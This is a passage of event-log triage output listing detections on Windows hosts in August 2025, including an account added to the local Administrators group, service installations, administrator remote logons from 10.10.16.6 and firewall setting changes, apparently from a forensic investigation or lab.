│                     │                                     │       │                                │          │           │                 │ ScriptPath: '%%1793'             │
│                     │                                     │       │                                │          │           │                 │ PasswordLastSet: '%%1794'        │
│                     │                                     │       │                                │          │           │                 │ UserParameters: '%%1793'         │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x725da'        │
│                     │                                     │       │                                │          │           │                 │ ProfilePath: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ AllowedToDelegateTo: '-'         │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: DESKTOP-8IR   │
│                     │                                     │       │                                │          │           │                 │ BDLK                             │
│                     │                                     │       │                                │          │           │                 │ HomePath: '%%1793'               │
│                     │                                     │       │                                │          │           │                 │ AccountExpires: '%%1794'         │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-21-38715   │
│                     │                                     │       │                                │          │           │                 │ 82759-1638593395-315824688-500   │
│                     │                                     │       │                                │          │           │                 │ DisplayName: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ HomeDirectory: '%%1793'          │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: Werni            │
│                     │                                     │       │                                │          │           │                 │ UserAccountControl: "\r\n\t\t%   │
│                     │                                     │       │                                │          │           │                 │ %2080\r\n\t\t%%2082\r\n\t\t%%2   │
│                     │                                     │       │                                │          │           │                 │ 084"                             │
│                     │                                     │       │                                │          │           │                 │ SidHistory: '-'                  │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-1002       │
│                     │                                     │       │                                │          │           │                 │ SamAccountName: Werni            │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: Administrator   │
│                     │                                     │       │                                │          │           │                 │ PrimaryGroupId: '513'            │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:11:59 │ ‣ User Added to Local Administrator │ 1     │ Microsoft-Windows-Security-Aud │ 4732     │ 1855      │ DESKTOP-8IRBDLK │ MemberName: '-'                  │
│                     │ Group                               │       │ iting                          │          │           │                 │ MemberSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-1002       │
│                     │                                     │       │                                │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: DESKTOP-8IR   │
│                     │                                     │       │                                │          │           │                 │ BDLK                             │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Builtin        │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-21-38715   │
│                     │                                     │       │                                │          │           │                 │ 82759-1638593395-315824688-500   │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: Administrators   │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-32-544          │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x725da'        │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: Administrator   │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:15:09 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:15:10 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:20:10 │ ‣ A Member Was Removed              │ 1     │ Microsoft-Windows-Security-Aud │ 4729     │ 1883      │ DESKTOP-8IRBDLK │ MemberName: '-'                  │
│                     │ From a Security-Enabled             │       │ iting                          │          │           │                 │ MemberSid: S-1-5-21-3871582759   │
│                     │ Global Group                        │       │                                │          │           │                 │ -1638593395-315824688-1000       │
│                     │                                     │       │                                │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: DESKTOP-8IR   │
│                     │                                     │       │                                │          │           │                 │ BDLK                             │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-21-38715   │
│                     │                                     │       │                                │          │           │                 │ 82759-1638593395-315824688-500   │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: None             │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-513        │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x725da'        │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: Administrator   │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:21:09 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 1891      │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x725da'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:33:29 │ ‣ Powershell File and Directory     │ 1     │ Microsoft-Windows-PowerShell   │ 4104     │ 158       │ Heisen-9-WS-6   │ MessageNumber: 1                 │
│                     │ Discovery                           │       │                                │          │           │                 │ ScriptBlockText: "# Copyright    │
│                     │                                     │       │                                │          │           │                 │ © 2008, Microsoft Corporation.   │
│                     │                                     │       │                                │          │           │                 │  All rights reserved.\r\n\r\n\   │
│                     │                                     │       │                                │          │           │                 │ r\n#Common utility functions\r   │
│                     │                                     │       │                                │          │           │                 │ \nImport-LocalizedData -Bindin   │
│                     │                                     │       │                                │          │           │                 │ gVariable localizationString -   │
│                     │                                     │       │                                │          │           │                 │ FileName CL_LocalizationData\r   │
│                     │                                     │       │                                │          │           │                 │ \n\r\n# Function to get user t   │
│                     │                                     │       │                                │          │           │                 │ roubleshooting history\r\nfunc   │
│                     │                                     │       │                                │          │           │                 │ tion Get-UserTSHistoryPath {\r   │
│                     │                                     │       │                                │          │           │                 │ \n  return \"${env:localappdat   │
│                     │                                     │       │                                │          │           │                 │ a}\\diagnostics\"\r\n}\r\n\r\n   │
│                     │                                     │       │                                │          │           │                 │ # Function to get admin troubl   │
│                     │                                     │       │                                │          │           │                 │ eshooting history\r\nfunction    │
│                     │                                     │       │                                │          │           │                 │ Get-AdminTSHistoryPath {\r\n     │
│                     │                                     │       │                                │          │           │                 │ return \"${env:localappdata}\\   │
│                     │                                     │       │                                │          │           │                 │ ...                              │
│                     │                                     │       │                                │          │           │                 │ (use --full to show all content) │
│                     │                                     │       │                                │          │           │                 │ ScriptBlockId: 7da842bc-aef6-4   │
│                     │                                     │       │                                │          │           │                 │ 776-a4b1-153a5ec853a1            │
│                     │                                     │       │                                │          │           │                 │ MessageTotal: 1                  │
│                     │                                     │       │                                │          │           │                 │ Path: C:\Windows\TEMP\SDIAG_90   │
│                     │                                     │       │                                │          │           │                 │ 2f7246-66c4-41e3-ae3d-8e78c05b   │
│                     │                                     │       │                                │          │           │                 │ 5308\CL_Utility.ps1              │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:54:29 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 2238      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x11eb542'       │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 22:05:37 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 2268      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xf933e'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 22:05:37 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 2274      │ Heisen-9-WS-6   │ TargetUserName: UMFD-2           │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-96-0-2      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Font Driver    │
│                     │                                     │       │                                │          │           │                 │ Host                             │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xe5264'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 22:05:39 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 2275      │ Heisen-9-WS-6   │ TargetUserName: DWM-2            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-2      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xe5fe6'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 22:05:39 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 2276      │ Heisen-9-WS-6   │ TargetUserName: DWM-2            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-2      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xe5da0'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 22:05:42 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 2278      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x5f0eb'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 16:47:55 │ ‣ Windows Firewall Settings         │ 1     │ Microsoft-Windows-Windows Fire │ 2002     │ 1307      │ Heisen-9-WS-6   │ ModifyingUser: S-1-5-80-308807   │
│                     │ Have Been Changed                   │       │ wall With Advanced Security    │          │           │                 │ 3201-1464728630-1879813800-110   │
│                     │                                     │       │                                │          │           │                 │ 7566885-823218052                │
│                     │                                     │       │                                │          │           │                 │ SettingValue: '06000000'         │
│                     │                                     │       │                                │          │           │                 │ SettingType: 2                   │
│                     │                                     │       │                                │          │           │                 │ SettingValueSize: 4              │
│                     │                                     │       │                                │          │           │                 │ SettingValueDisplay: Private,P   │
│                     │                                     │       │                                │          │           │                 │ ublic                            │
│                     │                                     │       │                                │          │           │                 │ Origin: 1                        │
│                     │                                     │       │                                │          │           │                 │ ModifyingApplication: ''         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 16:52:03 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 2709      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x123cb3'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 16:52:03 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 2710      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x123c95'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 16:55:19 │ ‣ Admin User Remote Logon           │ 1     │ Microsoft-Windows-Security-Aud │ 4624     │ 2866      │ Heisen-9-WS-6   │ AuthenticationPackageName: Neg   │
│                     │                                     │       │ iting                          │          │           │                 │ otiate                           │
│                     │                                     │       │                                │          │           │                 │ LogonProcessName: User32         │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundDomainName: '-'    │
│                     │                                     │       │                                │          │           │                 │ TargetLinkedLogonId: '0x0'       │
│                     │                                     │       │                                │          │           │                 │ LmPackageName: '-'               │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: HEISEN-9-WS-6   │
│                     │                                     │       │                                │          │           │                 │ $                                │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ IpAddress: 10.10.16.6            │
│                     │                                     │       │                                │          │           │                 │ KeyLength: 0                     │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2020b7'        │
│                     │                                     │       │                                │          │           │                 │ ElevatedToken: '%%1842'          │
│                     │                                     │       │                                │          │           │                 │ LogonGuid: 00000000-0000-0000-   │
│                     │                                     │       │                                │          │           │                 │ 0000-000000000000                │
│                     │                                     │       │                                │          │           │                 │ RestrictedAdminMode: '%%1843'    │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: WORKGROUP     │
│                     │                                     │       │                                │          │           │                 │ LogonType: 10                    │
│                     │                                     │       │                                │          │           │                 │ VirtualAccount: '%%1843'         │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundUserName: '-'      │
│                     │                                     │       │                                │          │           │                 │ WorkstationName: HEISEN-9-WS-6   │
│                     │                                     │       │                                │          │           │                 │ IpPort: '0'                      │
│                     │                                     │       │                                │          │           │                 │ ImpersonationLevel: '%%1833'     │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ TransmittedServices: '-'         │
│                     │                                     │       │                                │          │           │                 │ ProcessId: '0x56c'               │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: Administrator    │
│                     │                                     │       │                                │          │           │                 │ ProcessName: C:\Windows\System   │
│                     │                                     │       │                                │          │           │                 │ 32\svchost.exe                   │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:01:49 │ ‣ Potentially Suspicious            │ 1     │ Microsoft-Windows-Security-Aud │ 4688     │ 3036      │ Heisen-9-WS-6   │ TokenElevationType: '%%1936'     │
│                     │ Rundll32 Activity                   │       │ iting                          │          │           │                 │ TargetDomainName: '-'            │
│                     │                                     │       │                                │          │           │                 │ NewProcessId: '0x49c'            │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x2020b7'       │
│                     │                                     │       │                                │          │           │                 │ ParentProcessName: C:\Windows\   │
│                     │                                     │       │                                │          │           │                 │ System32\control.exe             │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x0'             │
│                     │                                     │       │                                │          │           │                 │ NewProcessName: C:\Windows\Sys   │
│                     │                                     │       │                                │          │           │                 │ tem32\rundll32.exe               │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: HEISEN-9-WS   │
│                     │                                     │       │                                │          │           │                 │ -6                               │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-21-38715   │
│                     │                                     │       │                                │          │           │                 │ 82759-1638593395-315824688-500   │
│                     │                                     │       │                                │          │           │                 │ ProcessId: '0x2338'              │
│                     │                                     │       │                                │          │           │                 │ CommandLine: '"C:\Windows\syst   │
│                     │                                     │       │                                │          │           │                 │ em32\rundll32.exe" Shell32.dll   │
│                     │                                     │       │                                │          │           │                 │ ,Control_RunDLL "C:\Windows\sy   │
│                     │                                     │       │                                │          │           │                 │ stem32\ncpa.cpl",'               │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: '-'              │
│                     │                                     │       │                                │          │           │                 │ MandatoryLabel: S-1-16-12288     │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: Administrator   │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-0-0           │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:12 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 3093      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2020b7'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:12 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 3094      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x33618'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:14 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3101      │ Heisen-9-WS-6   │ TargetUserName: UMFD-2           │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-96-0-2      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Font Driver    │
│                     │                                     │       │                                │          │           │                 │ Host                             │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x1eaf4a'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:15 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3102      │ Heisen-9-WS-6   │ TargetUserName: UMFD-1           │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-96-0-1      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Font Driver    │
│                     │                                     │       │                                │          │           │                 │ Host                             │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x9bb6'          │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:16 │ ‣ Windows Update Error              │ 1     │ Microsoft-Windows-WindowsUpdat │ 20       │ 956       │ Heisen-9-WS-6   │ updateRevisionNumber: 200        │
│                     │                                     │       │ eClient                        │          │           │                 │ errorCode: '0x8024001e'          │
│                     │                                     │       │                                │          │           │                 │ updateTitle: Security Intellig   │
│                     │                                     │       │                                │          │           │                 │ ence Update for Microsoft Defe   │
│                     │                                     │       │                                │          │           │                 │ nder Antivirus - KB2267602 (Ve   │
│                     │                                     │       │                                │          │           │                 │ rsion 1.435.284.0) - Current C   │
│                     │                                     │       │                                │          │           │                 │ hannel (Broad)                   │
│                     │                                     │       │                                │          │           │                 │ updateGuid: E32236C4-D193-433F   │
│                     │                                     │       │                                │          │           │                 │ -9CAB-15CEB791E735               │
│                     │                                     │       │                                │          │           │                 │ serviceGuid: 9482F4B4-E343-43B   │
│                     │                                     │       │                                │          │           │                 │ 6-B170-9A65BC822C77              │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:18 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3103      │ Heisen-9-WS-6   │ TargetUserName: DWM-2            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-2      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x1ecda9'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:18 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3104      │ Heisen-9-WS-6   │ TargetUserName: DWM-2            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-2      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x1eca58'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:18 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3105      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x1e3c97'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:18 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3106      │ Heisen-9-WS-6   │ TargetUserName: DWM-1            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-1      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xf383'          │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:18 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3107      │ Heisen-9-WS-6   │ TargetUserName: DWM-1            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-1      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xf330'          │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:05:22 │ ‣ Windows Update Error              │ 1     │ Microsoft-Windows-WindowsUpdat │ 20       │ 957       │ Heisen-9-WS-6   │ updateRevisionNumber: 1          │
│                     │                                     │       │ eClient                        │          │           │                 │ errorCode: '0x8024001e'          │
│                     │                                     │       │                                │          │           │                 │ updateTitle: 9NFFX4SZZ23L-Micr   │
│                     │                                     │       │                                │          │           │                 │ osoft.549981C3F5F10              │
│                     │                                     │       │                                │          │           │                 │ updateGuid: BD9AB7F6-D463-4C47   │
│                     │                                     │       │                                │          │           │                 │ -B356-5D2BD6A54FFC               │
│                     │                                     │       │                                │          │           │                 │ serviceGuid: 855E8A7C-ECB4-4CA   │
│                     │                                     │       │                                │          │           │                 │ 3-B045-1DFA50104289              │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:11:39 │ ‣ Windows Firewall Settings         │ 1     │ Microsoft-Windows-Windows Fire │ 2002     │ 1507      │ Heisen-9-WS-6   │ ModifyingUser: S-1-5-80-308807   │
│                     │ Have Been Changed                   │       │ wall With Advanced Security    │          │           │                 │ 3201-1464728630-1879813800-110   │
│                     │                                     │       │                                │          │           │                 │ 7566885-823218052                │
│                     │                                     │       │                                │          │           │                 │ SettingValue: '06000000'         │
│                     │                                     │       │                                │          │           │                 │ SettingType: 2                   │
│                     │                                     │       │                                │          │           │                 │ SettingValueSize: 4              │
│                     │                                     │       │                                │          │           │                 │ SettingValueDisplay: Private,P   │
│                     │                                     │       │                                │          │           │                 │ ublic                            │
│                     │                                     │       │                                │          │           │                 │ Origin: 1                        │
│                     │                                     │       │                                │          │           │                 │ ModifyingApplication: ''         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:11:49 │ ‣ Admin User Remote Logon           │ 1     │ Microsoft-Windows-Security-Aud │ 4624     │ 3321      │ Heisen-9-WS-6   │ AuthenticationPackageName: Neg   │
│                     │                                     │       │ iting                          │          │           │                 │ otiate                           │
│                     │                                     │       │                                │          │           │                 │ LogonProcessName: User32         │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundDomainName: '-'    │
│                     │                                     │       │                                │          │           │                 │ TargetLinkedLogonId: '0x0'       │
│                     │                                     │       │                                │          │           │                 │ LmPackageName: '-'               │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: HEISEN-9-WS-6   │
│                     │                                     │       │                                │          │           │                 │ $                                │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ IpAddress: 10.10.16.6            │
│                     │                                     │       │                                │          │           │                 │ KeyLength: 0                     │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x4804c'         │
│                     │                                     │       │                                │          │           │                 │ ElevatedToken: '%%1842'          │
